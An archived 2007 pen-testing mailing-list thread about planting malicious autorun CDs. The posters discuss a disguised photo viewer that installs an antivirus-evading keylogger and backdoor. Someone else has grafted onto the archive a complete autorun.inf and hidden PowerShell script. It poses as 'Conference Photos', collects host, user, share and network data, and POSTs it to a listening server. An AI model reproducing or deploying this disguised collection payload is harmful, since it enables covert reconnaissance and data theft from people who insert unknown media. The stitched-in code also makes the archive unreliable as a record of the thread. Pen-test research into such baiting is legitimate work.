RE: Evil autorun CD - ideas ? downloadable exploits anywhere ?

From: Shenk, Jerry A (jshenk@decommunications.com)
Date: Wed May 02 2007 - 21:28:14 EDT


How about something a little "less intrusive" - just grab ipconfig,
netstat, net user, net share and some other simple basic machine info
and post it to a waiting website. That would be enough to ID the
machine, maybe the user, perhaps some other info. For a pen-test, it
would be enough to generate a really interesting write-up on people
putting unknown CDs in their computers and demonstrate the danger of
autorun.

Now, rooting every box that runs the CD...that would be even more
interesting...but, if it's part of a pen-test, I'm not sure where the
problem would be...a user taking the CD home would definitely be
interesting...might be a little tough to keep that in scope. Maybe put
a warning label on it not to remove it from the building;)

-----Original Message-----
From: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com]
On Behalf Of Petr.Kazil@eap.nl
Sent: Wednesday, May 02, 2007 3:00 PM
To: 'Pen-Testing'
Subject: Evil autorun CD - ideas ? downloadable exploits anywhere ?

On the Internet there is much talk about hacking through "evil USB sticks":
http://www.theregister.co.uk/2007/04/25/usb_malware/

I was inspired by a talk by John Craddock where he told the following
anecdote:
- He would bake a stack of CDs and bring them to a conference. The stack
would gradually "evaporate" as people took a CD - even though the stack
was not marked as "free for taking". When people inserted the CD a tune
would be played. Gradually he would start hearing tunes in the
neighbourhood as people inserted the CD ...

It would be fun to make a few of these CDs and use them during a pentest.
Of course the payload should be more malicious then.

Question: Has anyone tried this before? Did it work?

Greetings, Petr Kazil


I will try to build a CD that will contain a photo viewer and a set of
innocent pictures. But it will try to install a keylogger and send the
collected data to a temporary server that I will install on the network.

My hope is that if I download C++ keylogger source code, modify it a bit
and compile it myself, that I will be able to evade virus checkers. I
also might compile and install a network listener backdoor. At the moment
I'm not even dreaming about rootkits and encrypted channels to the outside
world - that's much too difficult for me.

I don't think it will be able to collect password hashes or Active
Directory passwords because the script and programs will be running as a
normal domain user. But anyway it will be an interesting proof of
concept.

I wasn't able to find any exploit details on Google. I just get a lot of
articles about the risks of autorun and ways to disable it ...

This idea has one big risk - suppose someone takes the CD home. Then I
would be committing a criminal act if I exploited his home computer. The
articles about USB-stick pentesting don't mention this risk.

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!

http://www.cenzic.com/c/2020
------------------------------------------------------------------------





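The "less intrusive" payload Jerry suggests (grab ipconfig, netstat, net user, net share and post the result to a waiting web server), with the scope guard both posters worry about built in, as an added example that is not from either poster or from the list. It assumes PowerShell is present on the target (so Windows 7 or later, not the XP-era machines of the thread), that the CD's autorun.inf launches it, that the engagement's domain is CONTOSO and that the tester's listening server is http://10.0.0.5/drop; all of those names are placeholders to be replaced per engagement.

```powershell
# collect.ps1 -- added example for the autorun-CD pen-test discussed above.
# Launched by the CD's autorun.inf, whose assumed contents are:
#   [autorun]
#   open=powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File collect.ps1
#   icon=photos.ico
#   label=Conference Photos
# ASSUMPTIONS (placeholders, not from the original thread):
$InScopeDomain = 'CONTOSO'            # the client's domain NetBIOS name
$DropUrl       = 'http://10.0.0.5/drop'  # tester's HTTP server that logs POST bodies

# Scope guard: the thread's big risk is a user taking the CD home. Only run
# when the logged-on user belongs to the engagement's domain; otherwise exit
# silently without collecting or writing anything.
if ($env:USERDOMAIN -ne $InScopeDomain) { exit 0 }

# The basic machine info Jerry proposes; enough to identify host and user
# for the write-up, nothing that needs elevation.
$commands = @(
    'ipconfig /all',
    'netstat -an',
    'net user',
    'net share'
)

$report = New-Object System.Text.StringBuilder
[void]$report.AppendLine("host=$env:COMPUTERNAME user=$env:USERNAME domain=$env:USERDOMAIN time=$(Get-Date -Format o)")
foreach ($cmd in $commands) {
    [void]$report.AppendLine("===== $cmd =====")
    try {
        # Run through cmd.exe so the built-ins (net, ipconfig) behave as at a prompt.
        $out = cmd.exe /c $cmd 2>&1 | Out-String
    } catch {
        $out = "error running '$cmd': $_"
    }
    [void]$report.AppendLine($out)
}

# Post the report to the waiting server. Invoke-WebRequest needs PowerShell 3.0+,
# so fall back to System.Net.WebClient on older hosts.
$body = $report.ToString()
try {
    if (Get-Command Invoke-WebRequest -ErrorAction SilentlyContinue) {
        Invoke-WebRequest -Uri $DropUrl -Method Post -Body $body `
            -ContentType 'text/plain' -UseBasicParsing | Out-Null
    } else {
        $wc = New-Object System.Net.WebClient
        $wc.Headers['Content-Type'] = 'text/plain'
        [void]$wc.UploadString($DropUrl, 'POST', $body)
    }
} catch {
    # Drop server unreachable: do not retry, persist, or leave a copy behind.
    exit 0
}
```

The domain check is the part worth copying even if the rest changes: it turns the "warning label" Jerry jokes about into an enforced boundary, since a home machine will not report the client's domain and the script then does nothing at all. On the receiving side any web server that logs request bodies will do; each POST arrives with the host and user name on its first line, which is all the write-up needs to show who inserted the CD and where.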



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:45 EDT